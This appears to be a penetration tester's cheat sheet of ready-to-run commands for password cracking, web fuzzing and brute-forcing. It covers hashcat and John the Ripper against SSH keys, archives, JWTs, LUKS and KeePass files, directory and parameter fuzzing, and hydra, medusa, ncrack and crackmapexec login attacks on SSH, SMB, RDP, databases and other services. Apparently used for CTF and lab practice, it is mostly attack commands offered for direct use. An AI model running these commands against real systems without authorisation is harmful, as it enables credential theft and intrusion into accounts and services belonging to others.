Cracking / Fuzzing / Brute-force
00. Create Wordlists
00.1 Crunch
## ------------------| Usage
## crunch will display a wordlist that starts at a and ends at zzzzzzzz
crunch 8 8 -t @,%^
### Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and ^'s will change.
### @ --> lower case characters
### , --> upper case characters
### % --> numbers
### ^ --> symbols
## crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
crunch 1 6 abcdefg
## ------------------| Best Usages
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt
00.2 CeWL
cewl --with-numbers -d 7 -m 5 -w cewl.out http(s)://IP/anything/
# -d : Depth to spider to, default 2.
# -m : Minimum word length, default 3.
# -w : Write the output to the file.
# -c : Show the count for each word found.
# -o : Let the spider visit other sites.
# --with-numbers: Accept words with numbers in as well as just letters
# --header : In format name:value - can pass multiple.
# --lowercase : Lowercase all parsed words
# --auth_user : Authentication username.
# --auth_pass : Authentication password.
# --proxy_host: Proxy host.
# --proxy_port: Proxy port, default 8080.
00.3 UserNameGen
wget https://raw.githubusercontent.com/h4rithd/UserNameGen/master/usernamegen.py
pip install argparse textwrap3 tqdm
python usernamegen.py -o output.txt -u "Harith Dilshan"
python usernamegen.py -o output.txt -f usernames.txt
00.4 Username-Anarchy
## ------------------| Genarate quick username list for single user
ruby username-anarchy h4rithd dilshan
## ------------------| List username format plugins
ruby username-anarchy –list-formats
## ------------------| Genarate username list from file
ruby username-anarchy -input-file names.txt –select-format first,first.last,f.last,flast > newlist.txt
01. Cracking Basic
01.1 Hashcat Basic
Click here! to view example hashes (for to select mode -m)
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Common flags
-a Attack-mode
--force Ignore warnings
--status Enable automatic update of the status screen
--status-json Enable JSON format for status output
--session Define specific session name
--restore Restore session from --session
--outfile Define outfile for recovered hash
- [ Attack Modes ] -
# | Mode
===+======
0 | Straight
1 | Combination
3 | Brute-force
6 | Hybrid Wordlist + Mask
7 | Hybrid Mask + Wordlist
- [ Built-in charsets ] -
# | Mask Attack
====+======
?l | abcdefghijklmnopqrstuvwxyz
?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d | 0123456789
?h | 0123456789abcdef
?H | 0123456789ABCDEF
?s | «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a | ?l?u?d?s
?b | 0x00 - 0xff
Cracking
## ------------------| Without rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt
## ------------------| With rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule
HashCat Rules
hashcat --force passwords.list -r /usr/share/hashcat/rules/best64.rule --stdout > passwords.txt
# /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
# /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule
# /usr/share/hashcat/rules/T0XlC-insert_top_100_passwords_1_G.rule
# /usr/share/hashcat/rules/toggles1.rule
# /usr/share/hashcat/rules/specific.rule
# /usr/share/hashcat/rules/leetspeak.rule
# /usr/share/hashcat/rules/toggles2.rule
# /usr/share/hashcat/rules/toggles3.rule
# /usr/share/hashcat/rules/InsidePro-HashManager.rule
# /usr/share/hashcat/rules/T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
# /usr/share/hashcat/rules/generated.rule
# /usr/share/hashcat/rules/T0XlC.rule
# /usr/share/hashcat/rules/oscommerce.rule
# /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
# /usr/share/hashcat/rules/T0XlCv1.rule
# /usr/share/hashcat/rules/best64.rule
# /usr/share/hashcat/rules/dive.rule
# /usr/share/hashcat/rules/d3ad0ne.rule
# /usr/share/hashcat/rules/toggles5.rule
# /usr/share/hashcat/rules/combinator.rule
# /usr/share/hashcat/rules/toggles4.rule
# /usr/share/hashcat/rules/Incisive-leetspeak.rule
# /usr/share/hashcat/rules/unix-ninja-leetspeak.rule
# /usr/share/hashcat/rules/generated2.rule
# /usr/share/hashcat/rules/rockyou-30000.rule
## OneRuleToRuleThemAll
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule
Create Rules and Variants
## ------------------| Create file which has word or wordlist
echo -e "PleaseSubscribe\!" >> hashes
## ------------------| Create new wordlist
hashcat --stdout hashes -r /usr/share/hashcat/rules/best64.rule > pw-list
Cheat Sheets
https://github.com/frizb/Hashcat-Cheatsheet
https://hashcat.net/wiki/doku.php?id=hashcat
01.2 JohnTheRipper Basic
Cracking
john hashfile -w=/usr/share/wordlists/rockyou.txt
John Mutation
sudo vi /etc/john/john.conf
john --wordlist=words.txt --rules --stdout > new_wordlist.txt
john --wordlist=words.txt --rules=all --stdout > new_wordlist.txt
01.3 SSH
python3.8 /usr/share/john/ssh2john.py id_rsa.pub > id_rsa.john
john id_rsa.john -w=/usr/share/wordlists/rockyou.txt
01.4 ZIP
## ------------------| For Zip
sudo apt-get install fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
## or you can use following command with johntheripper
zip2john file.zip > hash
john hash
## ------------------| For 7z
sudo apt-get install libcompress-raw-lzma-perl
/usr/share/john/7z2john.pl backup.7z > backup.john
john backup.john -w=/usr/share/wordlists/rockyou.txt
## or you can use following command.
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
01.5 PDF
## ------------------| Using pdfcrack
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
## ------------------| Using qpdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
01.6 JWT
## ------------------| Using hashcat
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt
## ------------------| Using jwtcrack
pip install PyJWT tqdm
git clone https://github.com/Sjord/jwtcrack.git && cd jwtcrack
### Crack using jwtcrack
crackjwt.py <JWT_TOKEN> /usr/share/wordlists/rockyou.txt
### Convert a JWT to a format John the Ripper can understand.
jwt2john.py <JWT_TOKEN>
## ------------------| Using JohnTheRipper
john jwt_token.txt -w=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256
01.7 VNC
echo -n <PassWordHash> | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
01.8 WiFi
## ------------------| AirCrack-ng
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
01.9 LUKS
# ------------------| Using Hashcat
### Get count value
cryptsetup luksDump backup.img | grep Payload
### Create luks header hashfile
dd if=backup.img of=hash bs=512 count=4097
### Cracking
hashcat -m 14600 hash /usr/share/wordlists/rockyou.txt
# ------------------| Using JohnTheRipper
luks2john.py /dev/sdb1 > sdb1.john
john sdb.john -w=/usr/share/wordlists/rockyou.txt
# ------------------| How to mount/unmount
### Mount
sudo cryptsetup luksOpen backup.img backup
sudo mount /dev/mapper/backup /mnt/
### Unmount
sudo umount -l /mnt/
sudo cryptsetup luksClose backup
01.10 SUDO
# ------------------| Clone the sucrack programe and build it
git clone https://github.com/hemp3l/sucrack.git
cd sucrack
autoreconf -f -i
./configure
make
make install
cd src
ls -al sucrack
## ------------------| Cracking process
./sucrack -a -w 20 -s 10 -u root -r dict.txt
./sucrack -a -w 20 -s 10 -u root -rx dict.tx
01.11 Microsoft Office
## ------------------| Hashcat
wget https://raw.githubusercontent.com/stricture/hashstack-server-plugin-oclhashcat/master/scrapers/office2hashcat.py
python2 office2hashcat.py file.xls [doc,dot,docm,xlm,ppt] > hash.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt
## ------------------| JohnTheRipper
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py
python2 office2john.py file.xls [doc,dot,docm,xlm,ppt] > john-hash.txt
john john-hash.txt -w=/usr/share/wordlists/rockyou.txt
01.12 Group Policy Preferences
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
01.13 PFX certificate
/usr/share/john/pfx2john.py file.pfx > file.pfx.john
john file.pfx.john -w=/usr/share/wordlists/rockyou.txt
01.14 KeePass
## ------------------| JohnTheRipper
keepass2john Database.kdbx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
## ------------------| JohnTheRipper
01.15 Ansible
## ------------------| JohnTheRipper
https://fossies.org/linux/john/run/ansible2john.py
ansible2john file > hash
## ------------------| hashcat
ansible2john file > hash
hashcat -m 16900 hash /usr/share/wordlists/rockyou.txt --user
## ------------------| Decrypted
cat file | ansible-vault decrypt
03. Fuzzing Basic
## ------------------| Extention list
php,html,txt
php,html,txt,bak,tar,zip
php,html,txt,bak,tar,zip,aspx,asp
php,html,txt,bak,tar,zip,aspx,asp,jsp,js
php,html,txt,bak,tar,zip,aspx,asp,jsp,js,htm,exe
03.1 ffuf
Caution: This fucking tool is not good for username/password enumeration because of "Content-Type" header. use wfuzz tool or use -request methord.
## ------------------| General options
-H Header "Name: Value", separated by colon. Multiple -H flags are accepted.
-X HTTP method to use
-b Cookie data "NAME1=VALUE1; NAME2=VALUE2" for copy as curl functionality.
-d POST data
-c Colorize output. (default: false)
-r Follow redirects (default: false)
-u Target URL
-v Verbose output, printing full URL
-e Comma separated list of extensions. (.php,.txt,.html)
-x Proxy URL (SOCKS5 or HTTP). For example: http://127.0.0.1:8080 or socks5://127.0.0.1:8080
-ic Ignore wordlist comments (default: false)
-sni Target TLS SNI, does not support FUZZ keyword
-rate Rate of requests per second (default: 0)
-request File containing the raw http request (Like burp request)
-request-proto Protocol to use along with raw request (default: http
-timeout HTTP request timeout in seconds. (default: 10)
-ignore-body Do not fetch the response content. (default: false)
-recursion Scan recursively. Only FUZZ keyword is supported, and URL (-u) has to end in it. (default: false)
-recursion-depth Maximum recursion depth. (default: 0)
-recursion-strategy Recursion strategy: "default" for a redirect based, and "greedy" to recurse on all matches (default: default)
-replay-proxy Replay matched requests using this proxy.
## ------------------| Filter options
-fc Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr Filter regexp
-fs Filter HTTP response size. Comma separated list of sizes and ranges
-ft Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-fw Filter by amount of words in response. Comma separated list of word counts and ranges
## ------------------| Matcher options
-mc Match HTTP status codes, or "all" for everything. (default: 200,204,301,302,307,401,403,405)
-ml Match amount of lines in response
-mr Match regexp
-ms Match HTTP response size
-mt Match how many milliseconds to the first response byte, either greater or less than. EG: >100 or <100
-mw Match amount of words in response
Best Usage
## ------------------| Directory Fuzz
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://example.org/FUZZ | tee ffuf.out
## ------------------| With Extensions
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://example.org/FUZZ -e .php,.txt,.html | tee ffuf.out
## ------------------| Fuzz with numbers
ffuf -c -ic -w <(seq 0 2000) -u https://example.org/FUZZ | tee ffuf.out
## ------------------| Subdomain Fuzz
ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200
Fuzz with POST data
## ------------------| application/json
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error"
## ------------------| application/x-www-form-urlencoded
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "name=admin\&password=FUZZ" -fr "error"
## ------------------| From burp file
ffuf -w entries.txt -request-proto http -request getUsers.req -fr "error"
03.2 wfuzz
## ------------------| Genaral Options
-u url : Specify a URL for the request.
-w wordlist : Specify a wordlist file (alias for -z file,wordlist).
-V alltype : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
-e <type> : List of available encoders/payloads/iterators/printers/scripts
-c : Output with colors
-v : Verbose information.
-b cookie : Specify a cookie for the requests. Repeat option for various cookies.
-d postdata : Use post data (ex: "id=FUZZ&catalogue=1")
-H header : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
--basic/ntlm/digest auth : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
-f filename,printer : Store results in the output file using the specified printer (raw printer if omitted).
-o printer : Show results using the specified printer.
-t N : Specify the number of concurrent connections (10 default)
-s N : Specify time delay between requests (0 default)
-R depth : Recursive path discovery being depth the maximum recursion level.
-D depth : Maximum link depth level.
-L,--follow : Follow HTTP redirections
-Z : Scan mode (Connection errors will be ignored).
--req-delay N : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
--conn-delay N : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.
## ------------------| Scripts
-A, --AA, --AAA : Alias for -v -c and --script=default,verbose,discover respectively
--no-cache : Disable plugins cache. Every request will be scanned.
--script= : Equivalent to --script=default
--script=<plugins> : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
--script-help=<plugins> : Show help about scripts.
--script-args n1=v1,... : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"
## ------------------| Payloads
-m iterator : Specify an iterator for combining payloads (product by default)
-z payload : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
Encoders category can be used. ie. url
Use help as a payload to show payload plugin's details (you can filter using --slice)
--zP <params> : Arguments for the specified payload (it must be preceded by -z or -w).
--zD <default> : Default parameter for the specified payload (it must be preceded by -z or -w).
--zE <encoder> : Encoder for the specified payload (it must be preceded by -z or -w).
--slice <filter> : Filter payload's elements using the specified expression. It must be preceded by -z.
## ------------------| Filter options
--filter-help : Filter language specification
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+ : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex : Show/hide responses with the specified regex within the content
--filter <filter> : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
--prefilter <filter> : Filter items before fuzzing using the specified expression. Repeat for concatenating filters.
Find valid usernames | POST data
wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=test123" --hs "No account found with that username" http://10.10.10.97/login.php | tee usernames.txt
Other commands
## ------------------| Range script
wfuzz -c -z range,1-65535 http:127.0.0.1:FUZZ
## ------------------| With encoders
### List avilable encoders
wfuzz -e encoders
### User url encoder
wfuzz -w /wordlist.txt,uri_hex
03.3 Gobuster
## ------------------| Genaral Options
-z, --no-progress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
--delay duration Time each thread waits between requests (e.g. 1500ms)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
-f, --add-slash Append / to each request
-c, --cookies string Cookies to use for the requests
-e, --expanded Expanded mode, print full URLs
-x, --extensions string File extension(s) to search for
-r, --follow-redirect Follow redirects
-H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-k, --no-tls-validation Skip TLS certificate verification
-n, --no-status Don't print status codes
-p, --password string Password for Basic Auth
-P, --proxy string Proxy to use for requests [http(s)://host:port][socks5://127.0.0.1:1080]
-s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set) (default "200,204,301,302,307,401,403")
-b, --status-codes-blacklist string Negative status codes (will override status-codes if set)
--timeout duration HTTP Timeout (default 10s)
-u, --url string The target URL
-a, --useragent string Set the User-Agent string (default "gobuster/3.1.0")
-U, --username string Username for Basic Auth
-d, --discover-backup Upon finding a file search for backup files
--wildcard Force continued operation when wildcard found
Best Usage
gobuster dir -e -f -t 20 -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt -o gobuster.out -u https://mysite.com/
DNS mode
gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-dns.out -d google.com
VHOST Mode
gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-vhost.out -u https://mysite.com
Search backup files
gobuster dir -e -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -d -o gobuster-backups.out -u https://mysite.com/
Fuzzing Mode
gobuster fuzz -u https://example.com?FUZZ=test -w parameter-names.txt
03.4 DirSearch
## ------------------| Genaral Options
-u Target URL
-e Extension list separated by commas (Example: php,asp)
-X Exclude extension list separated by commas (Example: asp,jsp)
-f Add extensions to every wordlist entry. By default dirsearch only replaces the %EXT% keyword with extensions
-t Number of threads
-r Brute-force recursively
-i Include status codes, separated by commas, support ranges (Example: 200,300-399)
-x Exclude status codes, separated by commas, support ranges (Example: 301,500-599)
-q Quiet mode
-m HTTP method (default: GET)
-d HTTP request data
-H HTTP request header, support multiple flags (Example: -H 'Referer: example.com')
-F Follow HTTP redirects
-s Delay between requests
-o Output file
--format Report format (Available: simple, plain, json, xml,md, csv, html)
--proxy Proxy URL, support HTTP and SOCKS proxies (Example: localhost:8080, socks5://localhost:8088)
--timeout Connection timeout
--cookie Choose a cookie for each request
--user-agent Choose a User-Agent for each request
--random-agent Choose a random User-Agent for each request
--full-url Full URLs in the output (enabled automatically in quiet mode)
--no-color No colored output
--exclude-sizes Exclude responses by sizes, separated by commas (Example: 123B,4KB)
--exclude-texts Exclude responses by texts, separated by commas (Example: 'Not found', 'Error')
-U Uppercase wordlist
-L Lowercase wordlist
-C Capital wordlist
--raw=FILE Load raw HTTP request from file (use `--scheme` flag to set the scheme)
Best Usage
dirsearch -r -f -o `pwd`/dirsearch.out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e php,html,txt -u http://example.org/
When using HTB
url=http://nineveh.htb/department
dirsearch -f -o `pwd`/$(echo $url | cut -d '/' -f 3).out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u $url -e php
03.5 feroxbuster
## ------------------| Genaral Options
-u The target URL
-a Sets the User-Agent (default: feroxbuster/2.7.0)
-A Use a random User-Agent
-f Append / to each request's URL
-H Specify HTTP headers to be used in each request (ex: -H Header:val -H 'stuff: things')
-m Which HTTP request method(s) should be sent (default: GET)
-Q Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-x File extension(s) to search for (ex: -x php -x pdf js)
-k Disables TLS certificate validation in the client
-r Allow client to follow redirects
-T Number of seconds before a client's request times out (default: 7)
--data Request's Body; can read data from a file if input starts with an @ (ex: @post.bin)
-b, --cookies Specify HTTP cookies to be used in each request (ex: -b stuff=things)
--resume-from State file from which to resume a partially complete scan
--burp Set --proxy to http://127.0.0.1:8080 and set --insecure to true
--burp-replay Set --replay-proxy to http://127.0.0.1:8080 and set --insecure to true
--smart Set --extract-links, --auto-tune, --collect-words, and --collect-backups to true
--thorough Use the same settings as --smart and set --collect-extensions to true
--force-recursion Force recursion attempts on all 'found' endpoints (still respects recursion depth)
## ------------------| Response filters
-C Filter out status codes (deny list) (ex: -C 200 -C 401)
-N Filter out messages of a particular line count (ex: -N 20 -N 31,30)
-s Status Codes to include (allow list) (default: 200 204 301 302 307 308 401 403 405)
-S Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-W Filter out messages of a particular word count (ex: -W 312 -W 91,82)
-X Filter out messages via regular expression matching on the response's body (ex: -X '^ignore me$')
## ------------------| Dynamic collection settings
-B Automatically request likely backup extensions for "found" urls
-E Automatically discover extensions and add them to --extensions (unless they're in --dont-collect)
-g Automatically discover important words from within responses and add them to the wordlist
-I File extension(s) to Ignore while collecting extensions (only used with --collect-extensions)
## ------------------| Output settings
--no-state Disable state output file (*.state)
--silent Only print URLs + turn off logging (good for piping a list of urls to other commands)
-o Output file to write results to (use w/ --json for JSON entries)
-q Hide progress bars and banner (good for tmux windows w/ notifications)
-v Increase verbosity level (use -vv or more for greater effect. [CAUTION] 4 -v's is probably too much)
Best Usage
feroxbuster -k -f -A -u <URL>
03.6 Arjun
## ------------------| Setup
apt-get install arjun
pip3 install arjun
## ------------------| Usage
arjun -u https://api.example.com/endpoint
arjun -u https://api.example.com/endpoint -m POST
arjun -u https://api.example.com/endpoint -m JSON --include='{"root":{"a":"b",$arjun$}}'
04. Brute-force Basic
04.1 HTTP
Common useful flags
hydra -u -f -t 10 -w 30 -L users.txt -P pass.txt 192.168.1.69 http-post-form "/login.php:user=^USER^&pass=^PASS^:Bad login" -o hydra-http-post-attack.txt
# Host : 192.168.1.69
# Method : http-form-post / https-post-form / http-get-form / http-get(for basic-auth)
# URI : /login.php
# Form parameters : user=^USER^&pass=^PASS^
# Failure response : Bad login
# -L : users.txt
# -l : username
# -P : pass.txt
# -t : Threads
# -w : Wait for timeout
# -S : Perform an SSL connect [https]
# -s : If the service is on a different default port
# -o : Output file
# -f : exit when a login/pass pair is found
# -R : Restore a previous aborted/crashed session
# -I : Ignore an existing restore file
# -u : Loop around users, not passwords (effective! implied with -x
## If you want proxy export HYDRA_PROXY_HTTP=http://127.0.0.1:8080
https-post-form
hydra -S -u -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password"
http-get (basic auth) / Tomcat
hydra -u -f -l admin -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 10.10.10.157 http-get "/monitoring"
With headers
hydra 192.168.1.69 http-post-form "/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo" \
-L users.txt -P pass.txt -t 10 -w 1 -o hydra-http-post-attack.txt
# in this case we specify that the cookie should be page/cookie
# cookies can be specified with C=
# and we also added an header with H=
# this header is called X-Foo and has as value Foo
04.2 SSH
## ------------------| Using Hydra
hydra -v -V -u -f -L users.txt -p "Password!" -t 2 -u $ip ssh
hydra -v -V -u -f -l root -P /usr/share/wordlists/rockyou.txt -t 2 -u $ip ssh
hydra -v -V -u -f -L users.txt -P /usr/share/wordlists/rockyou.txt -t 2 -u $ip ssh
## -v Verbose mode
## -L User List
## -P Password List
## -V How login+pass for each attempt
## -u Loop around users, not passwords (effective! implied with -x)
## -o Write found login/password pairs to FILE instead of stdout
## -t Run TASKS number of connects in parallel per target (default: 16)
## -f / -F Exit when a login/pass pair is found (-M: -f per host, -F global)
## -fr Regex
## ------------------| Using NCrack
ncrack -v -p 22 --user root -P /usr/share/wordlists/rockyou.txt <IP> -T5
## ------------------| Using Patator
patator ssh_login host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0
patator ssh_login -x ignore:fgrep='failed' host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0
## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M ssh <IP>
04.3 SMB
## ------------------| Using Nmap
nmap --script smb-brute -p 445 <IP>
## ------------------| Using CrackMapExec
crackmapexec smb <IP> -u users.txt -p /usr/share/wordlists/rockyou.txt --continue-on-success
crackmapexec smb <IP> -u Hazard -p /usr/share/wordlists/rockyou.txt --shares
## ------------------| Using Hydra
hydra -u -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
04.4 RDP
## ------------------| Using Hydra
hydra -t 1 -V -f -u -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
hydra -V -f -u -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt rdp://<IP>
## ------------------| Using NCrack
ncrack -vv --user <UserName> -P /usr/share/wordlists/rockyou.txt rdp://<IP>
## ------------------| Using Crowbar
crowbar -b rdp -s <IP>/CIDR -u <USER> -C /usr/share/wordlists/rockyou.txt
crowbar -b rdp -s <IP>/CIDR -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -C /usr/share/wordlists/rockyou.txt
04.5 LDAP
## ------------------| Nmap (Basic)
nmap --script ldap-brute -p 389 <IP>
## ------------------| Using Hydra
hydra -V -f -u -L users.txt -P /usr/share/wordlists/rockyou.txt <IP> ldap2
## ------------------| Using CackMapExec
crackmapexec ldap <IP> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt
04.6 FTP
## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt [-t 32] <IP> ftp
## ------------------| Using Ncrack
ncrack -p 21 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]
## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M ftp
04.7 SNMP
## ------------------| Using Nmap
nmap -sU --script snmp-brute <IP> [--script-args snmp-brute.communitiesdb=<wordlist> ]
## ------------------| Using Hydra
hydra -u -f -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP snmp
## ------------------| Using MSF
use auxiliary/scanner/snmp/snmp_login
## ------------------| Using onesixtyone
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>
04.8 SMTP
hydra -u -f -V -l <username> -P /usr/share/wordlists/rockyou.txt <IP> smtp
### If you need ssl: use S
hydra -u -f -S -v -V -l <username> -P /usr/share/wordlists/rockyou.txt -s 587 <IP>
04.9 WinRM
## ------------------| Using CackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt
04.10 MySQL
## ------------------| Using Hydra
hydra -u -f -l root –P /usr/share/wordlists/rockyou.txt -s 3306 <IP> mysql
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> mysql
04.11 MSSQL
## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt <IP> mssql
## ------------------| Using Medusa
medusa -h <IP> –U /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt –M mssql
## ------------------| Using Nmap
### Use the NetBIOS name of the machine as domain
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt,ms-sql-brute.brute-windows-accounts <IP>
## ------------------| Using Metasploit
## If you have a domain set it and use USE_WINDOWS_ATHENT
use auxiliary/scanner/mssql/mssql_login
04.12 MongoDB
## ------------------| Using Nmap
nmap -sV --script mongodb-brute -n -p 27017 <IP>
## ------------------| Using Metasploit
use auxiliary/scanner/mongodb/mongodb_login
04.13 OracleSQL
## ------------------| Using Nmap
sudo nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
### Offline hash brute (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
sudo nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 1<IP>
## ------------------| Using Patator
pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017.
## ------------------| Using ODAT (Oracle Database Attacking Tool)
./odat.py passwordguesser -s <SERVER_IP> -d <SID>
./odat.py passwordguesser -s <SERVER_IP> -p <PORT> --accounts-file accounts_multiple.txt
## ------------------| Using Metasploit
use admin/oracle/oracle_login
## or
use scanner/oracle/oracle_login
set RHOSTS <IP>
set RPORTS 1521
set SID <SID>
04.15 PostgreSQL
## ------------------| Using Hydra
hydra -u -f -L usernames.txt –P /usr/share/wordlists/rockyou.txt <IP> postgres
## ------------------| Using Medusa
medusa -h <IP> –U usernames.txt –P /usr/share/wordlists/rockyou.txt –M postgres
## ------------------| Using Ncrack
ncrack –v –U usernames.txt –P /usr/share/wordlists/rockyou.txt <IP>:5432
## ------------------| Using Patator
patator pgsql_login host=<IP> user=FILE0 0=usernames.txt password=FILE1 1=/usr/share/wordlists/rockyou.txt
## ------------------| Using Metasploit
use auxiliary/scanner/postgres/postgres_login
## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>
04.16 Telnet
## ------------------| Using Hydra
hydra -u -f -l <username> -P /usr/share/wordlists/rockyou.txt telnet://targetname
## ------------------| Using Ncrack
ncrack -p 23 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]
## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M telnet
04.17 VNC
## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> vnc -u -vV
## ------------------| Using Medusa
medusa -h <IP> –u root -P /usr/share/wordlists/rockyou.txt –M vnc
## ------------------| Using Ncrack
ncrack -V --user root -P /usr/share/wordlists/rockyou.txt <IP>:5432
## ------------------| Using Patator
patator vnc_login host=<IP> password=FILE0 0=/usr/share/wordlists/rockyou.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
## ------------------| Using Metasploit
use auxiliary/scanner/vnc/vnc_login
